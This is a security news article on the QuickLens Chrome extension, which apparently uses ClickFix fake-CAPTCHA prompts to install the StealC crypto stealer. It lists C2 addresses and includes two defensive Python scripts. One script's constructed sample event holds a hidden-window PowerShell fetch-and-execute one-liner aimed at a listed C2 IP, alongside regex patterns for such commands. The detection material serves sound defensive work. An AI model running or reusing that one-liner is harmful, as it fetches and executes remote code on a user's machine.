PROBABLYPWNED
Malware | February 28, 2026 | 5 min read

QuickLens Chrome Extension Steals Crypto via ClickFix

Malicious QuickLens browser add-on combines Google Lens functionality with ClickFix social engineering to drain cryptocurrency wallets through fake CAPTCHA prompts.

James Rivera

Security researchers have flagged QuickLens, a Chrome browser extension masquerading as a Google Lens integration tool, as a delivery mechanism for cryptocurrency-stealing malware. The extension combines legitimate visual search functionality with the ClickFix social engineering technique to drain victims' crypto wallets.

The campaign represents another evolution in ClickFix tradecraft, which has become the go-to method for bypassing security tools by convincing users to run malicious commands themselves.

How QuickLens Operates

QuickLens advertises itself as a utility for visual searches—selecting images, searching YouTube frames, and integrating Amazon product lookup. The legitimate features work as described, which helps the extension maintain a veneer of credibility and avoid immediate removal reports.

The malicious behavior triggers under specific conditions. After installation, the extension monitors browsing activity for cryptocurrency-related sites. When users visit exchanges, wallet interfaces, or DeFi platforms, QuickLens activates its payload delivery mechanism.

The attack follows the standard ClickFix playbook documented by LevelBlue's SpiderLabs research team. Users encounter what appears to be a Cloudflare-style verification prompt claiming they need to confirm they're human. The fake CAPTCHA instructs victims to:

  1. Press Win+R to open the Run dialog
  2. Press Ctrl+V to paste a command
  3. Press Enter to execute

What users don't realize: QuickLens has already copied a malicious PowerShell command to their clipboard. The command looks technical enough to seem legitimate but downloads and executes the StealC information stealer.

What Gets Stolen

StealC specifically targets cryptocurrency assets across multiple vectors. According to Hackread's analysis, the malware harvests credentials from over 50 browser-based wallet extensions by accessing their local storage directories.

Primary targets include:

  • MetaMask - private keys and vault data
  • Phantom - Solana wallet credentials
  • Coinbase Wallet - authentication tokens
  • Trust Wallet - seed phrases and configuration
  • Exodus - wallet backup files
  • Atomic Wallet - encrypted keystore data

Beyond browser extensions, StealC also sweeps desktop wallet applications including Electrum, Bitcoin Core, Ethereum Wallet, and Monero GUI. The malware extracts seed phrases, private keys, wallet passwords, and transaction history—everything needed for complete asset theft.

Browser credentials get harvested too. Chromium-based browsers store passwords in encrypted databases that StealC decrypts using Windows DPAPI. Firefox profiles get targeted separately through NSS3.dll library calls.

Technical Delivery Chain

The infection follows a four-stage process designed to evade detection:

Stage 1: The clipboard-hijacked PowerShell command connects to attacker infrastructure at a rotating set of IP addresses. CyberProof researchers identified several command-and-control servers including 91.92.240.219, 94.154.35.115, and 178.16.53.70.

Stage 2: A loader script performs in-memory shellcode injection using Windows API calls—VirtualAlloc for memory allocation, CreateThread for execution. No disk artifacts get written at this stage.

Stage 3: Donut framework shellcode loads a 64-bit PE downloader that fetches the final StealC payload.

Stage 4: StealC injects itself into a spoofed svchost.exe process and begins data collection.

The entire chain operates in memory where possible, making forensic recovery difficult. Microsoft Defender has flagged samples as Behavior:Win32/SuspClickFix.C.

Browser Extension Permissions Abuse

What makes QuickLens particularly dangerous is its permission scope. The extension requests access to browser storage, clipboard operations, and cross-origin requests—all permissions that legitimate visual search tools might reasonably need.

These same permissions enable the malicious functionality. Storage access allows monitoring wallet extension data. Clipboard manipulation enables the ClickFix paste attack. Network permissions let the extension communicate with external infrastructure.

This attack pattern mirrors what we covered when Chrome extensions targeted Meta Business accounts—legitimate-seeming tools that weaponize standard browser APIs.

Connection to Broader Campaign

QuickLens doesn't appear to be an isolated incident. The infrastructure overlaps with previous ClickFix campaigns that deployed Amatera stealer through App-V abuse. Attackers continue iterating on the core technique while swapping delivery mechanisms and payloads.

Chrome's recent WebView security bypass may have provided additional attack surface for extensions operating outside normal sandbox restrictions.

The cryptocurrency sector has faced sustained targeting. Last month's CrossCurve bridge exploit demonstrated that attackers pursue crypto assets through every available vector—smart contract vulnerabilities, phishing, malicious extensions, and social engineering.

Protecting Yourself

Extensions represent a significant attack surface that many users overlook. Consider these defensive measures:

Audit installed extensions regularly. Chrome's extension management page (chrome://extensions) shows all installed add-ons. Remove anything you don't actively use or don't remember installing.

Check extension permissions. Click "Details" on any extension to review its permissions. Visual search tools shouldn't need clipboard access or broad network permissions.
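The two checks above can be scripted. The following is an added example written for this article, not code from QuickLens, Google, or any of the researchers cited: it walks a Chrome profile's Extensions directory, reads each extension's manifest.json, and reports the permissions the article singles out, clipboard access and broad host access. The permission names and the profile paths are real Chrome conventions; which permissions count as "risky" is this example's own choice, and the two manifests embedded at the bottom are constructed samples, not QuickLens's actual manifest.

```python
"""Flag installed Chrome extensions whose permissions exceed what a visual-search tool needs.

Added example (not QuickLens code and not a Google tool). It reads the
manifest.json of every installed extension in a Chrome profile and reports
clipboard and broad host-access permissions, the two the article singles out.
"""
import json
import os
import sys
from pathlib import Path

# Permissions that grant clipboard access or equally powerful capabilities.
# These are real Chrome permission names; the selection is this example's choice.
RISKY_PERMISSIONS = {"clipboardRead", "clipboardWrite", "nativeMessaging", "debugger"}

# Host patterns that amount to "every site the user visits".
BROAD_HOSTS = {"<all_urls>", "*://*/*", "http://*/*", "https://*/*"}


def assess_manifest(manifest: dict) -> dict:
    """Return a report for one extension manifest (Manifest V2 or V3)."""
    perms = set(manifest.get("permissions", []))
    # MV3 keeps host patterns in host_permissions; MV2 mixed them into permissions.
    hosts = set(manifest.get("host_permissions", []))
    hosts |= {p for p in perms if "://" in p or p == "<all_urls>"}
    risky = sorted(perms & RISKY_PERMISSIONS)
    broad = sorted(hosts & BROAD_HOSTS)
    return {
        # Names are often localized placeholders like "__MSG_appName__";
        # the extension id (directory name) is the stable identifier.
        "name": manifest.get("name", "?"),
        "version": manifest.get("version", "?"),
        "manifest_version": manifest.get("manifest_version"),
        "risky_permissions": risky,
        "broad_host_access": broad,
        "uses_storage": "storage" in perms,  # common, so reported but not flagged alone
        "needs_review": bool(risky or broad),
    }


def default_extension_root() -> Path:
    """Chrome's per-profile extension directory on Windows, macOS and Linux."""
    if sys.platform.startswith("win"):
        return Path(os.environ.get("LOCALAPPDATA", "")) / "Google" / "Chrome" / "User Data" / "Default" / "Extensions"
    if sys.platform == "darwin":
        return Path.home() / "Library" / "Application Support" / "Google" / "Chrome" / "Default" / "Extensions"
    return Path.home() / ".config" / "google-chrome" / "Default" / "Extensions"


def scan_extensions(root: Path) -> list[dict]:
    """Walk <root>/<extension-id>/<version>/manifest.json and assess each one."""
    reports = []
    for manifest_path in sorted(root.glob("*/*/manifest.json")):
        try:
            manifest = json.loads(manifest_path.read_text(encoding="utf-8"))
        except (OSError, ValueError):
            continue  # unreadable or partially written manifest; skip it
        report = assess_manifest(manifest)
        report["id"] = manifest_path.parent.parent.name
        reports.append(report)
    return reports


# Constructed manifests for demonstration; neither is QuickLens's real manifest.
SAMPLE_MANIFEST = {
    "manifest_version": 3,
    "name": "Visual Search Helper (constructed sample)",
    "version": "1.0",
    "permissions": ["activeTab", "storage", "clipboardWrite", "contextMenus"],
    "host_permissions": ["<all_urls>"],
}
BENIGN_MANIFEST = {
    "manifest_version": 3,
    "name": "Minimal Lookup (constructed sample)",
    "version": "1.0",
    "permissions": ["activeTab", "contextMenus"],
    "host_permissions": ["https://lens.google.com/*"],
}

if __name__ == "__main__":
    root = Path(sys.argv[1]) if len(sys.argv) > 1 else default_extension_root()
    for r in scan_extensions(root):
        if r["needs_review"]:
            print(f"{r['id']} {r['name']} v{r['version']}: "
                  f"risky={r['risky_permissions']} broad_hosts={r['broad_host_access']}")
```

Run it with no arguments to scan the default profile, or pass another profile's Extensions directory. A hit is a prompt to open the extension's "Details" page and ask whether the feature set justifies the permission, not proof of malice: many legitimate extensions ask for broad host access, which is exactly why the manual review the article recommends still matters.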

Use hardware wallets. Software wallets—whether browser extensions or desktop applications—store keys on your computer. Hardware wallets keep private keys on isolated devices that malware can't access.

Verify extension publishers. Before installing, check the developer name, number of users, and reviews. QuickLens had mixed reviews with some users reporting suspicious behavior before the malware connection was confirmed.

Never run commands from popups. No legitimate service asks you to open Run, paste commands, and execute them. This is always an attack.

Organizations managing crypto assets should consider browser isolation and extension whitelisting. Endpoint detection rules can flag clipboard hijacking and PowerShell invocations from browser processes.
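One way to build the endpoint rule just described, and to catch Stage 1 of the delivery chain above before anything reaches memory, is to score process-creation telemetry. The following is an added example, not code from the article's sources or from any EDR vendor. It takes JSON-lines events with Sysmon-style field names (Image, ParentImage, CommandLine), which is an assumed export format, and raises severity when a shell is started from the Run dialog (parent explorer.exe) or directly by a browser process, when the command line carries fetch-and-execute or hidden-window cues, and when it references one of the C2 addresses CyberProof reported for this campaign. The sample events at the bottom are constructed for the demonstration; the weights and thresholds are this example's own.

```python
"""Score process-creation events for the ClickFix pattern the article describes.

Added example, not from the article's sources or any vendor. Input is
JSON-lines with Sysmon-style field names (Image, ParentImage, CommandLine),
as an EDR or SIEM export might produce (assumed format).
"""
import json
import ntpath
import re

# Addresses reported by CyberProof for this campaign (quoted in the article).
C2_IPS = {"91.92.240.219", "94.154.35.115", "178.16.53.70"}

SHELLS = {"powershell.exe", "pwsh.exe", "cmd.exe", "mshta.exe"}
BROWSERS = {"chrome.exe", "msedge.exe", "firefox.exe", "brave.exe", "opera.exe"}

# Command-line cues typical of ClickFix one-liners: remote fetch, in-memory
# evaluation, encoded commands, hidden window.
CUES = re.compile(
    r"(?i)(\biwr\b|invoke-webrequest|downloadstring|downloadfile|\biex\b|"
    r"invoke-expression|-enc\w*|-w(?:indowstyle)?\s+hidden)"
)


def score_event(ev: dict) -> dict:
    """Return severity and the reasons behind it for one process-creation event."""
    # ntpath handles Windows paths regardless of the host running the script.
    image = ntpath.basename(ev.get("Image", "")).lower()
    parent = ntpath.basename(ev.get("ParentImage", "")).lower()
    cmd = ev.get("CommandLine", "")
    score, reasons = 0, []

    if image in SHELLS and parent == "explorer.exe":
        # Win+R starts the shell as a child of explorer.exe. Admins do this
        # legitimately all day, so on its own it is only worth one point.
        score += 1
        reasons.append("shell started from explorer.exe (Run dialog)")
    if image in SHELLS and parent in BROWSERS:
        # Browsers should not be spawning shells at all.
        score += 2
        reasons.append(f"shell started by browser process {parent}")
    if CUES.search(cmd):
        score += 1
        reasons.append("download/execute or hidden-window cue in command line")
    for ip in sorted(C2_IPS & set(re.findall(r"\d{1,3}(?:\.\d{1,3}){3}", cmd))):
        score += 3
        reasons.append(f"known C2 address {ip}")

    severity = "high" if score >= 3 else "medium" if score == 2 else "low" if score == 1 else "none"
    return {"image": image, "parent": parent, "score": score, "severity": severity, "reasons": reasons}


def analyze_events(jsonl: str) -> list[dict]:
    """Score every non-empty JSON line, preserving input order."""
    return [score_event(json.loads(line)) for line in jsonl.splitlines() if line.strip()]


# Constructed events for demonstration (not real telemetry). The first mimics
# the Run-dialog launch of a fetch-and-execute one-liner with a placeholder
# path; the others are benign or ambiguous activity to show the separation.
SAMPLE_EVENTS_JSONL = r"""
{"Image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", "ParentImage": "C:\\Windows\\explorer.exe", "CommandLine": "powershell -w hidden -c \"iwr http://91.92.240.219/EXAMPLE | iex\""}
{"Image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", "ParentImage": "C:\\Windows\\explorer.exe", "CommandLine": "powershell Get-Process"}
{"Image": "C:\\Program Files\\Google\\Chrome\\Application\\chrome.exe", "ParentImage": "C:\\Windows\\explorer.exe", "CommandLine": "\"chrome.exe\""}
{"Image": "C:\\Windows\\System32\\cmd.exe", "ParentImage": "C:\\Program Files\\Google\\Chrome\\Application\\chrome.exe", "CommandLine": "cmd /c whoami"}
"""

if __name__ == "__main__":
    for r in analyze_events(SAMPLE_EVENTS_JSONL):
        print(f"{r['severity']:6} {r['parent']} -> {r['image']}: {'; '.join(r['reasons']) or 'no findings'}")
```

The weighting matters more than the individual indicators: a shell under explorer.exe is routine, a fetch-and-execute cue alone may be an administrator, but the two together, or either combined with a campaign address, is what the Run-dialog ClickFix flow looks like on the endpoint. Hard-coded C2 addresses rot quickly (the article notes the set rotates), so the parent-process and command-line signals are the durable part of the rule.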

Why This Matters

The ClickFix technique works because it sidesteps technical security controls entirely: the user executes the payload by hand, so detection built around catching an exploit has nothing to catch.

Browser extensions remain an undermonitored attack vector despite Google's Manifest V3 restrictions. Legitimate functionality can coexist with malicious code, and reviews alone can't catch sophisticated threats.

For cryptocurrency holders, the stakes are particularly high. Unlike traditional financial theft, crypto transactions are irreversible. Once assets leave your wallet, there's no chargeback or fraud protection. Prevention is the only viable defense.

Users who installed QuickLens should immediately uninstall the extension, scan their systems for malware, and consider any wallet credentials stored on that machine compromised. Moving assets to fresh wallets generated on clean devices is the safest approach.
